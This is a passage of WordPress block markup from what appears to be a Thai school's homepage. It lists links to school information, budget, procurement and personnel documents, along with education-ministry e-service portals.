{\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงบประมาณ</a><br>       - คู่มือฝ่ายบริหารงานวิชาการ<br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>       - คู่มือฝ่ายบริหารงานทั่วไป</td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" 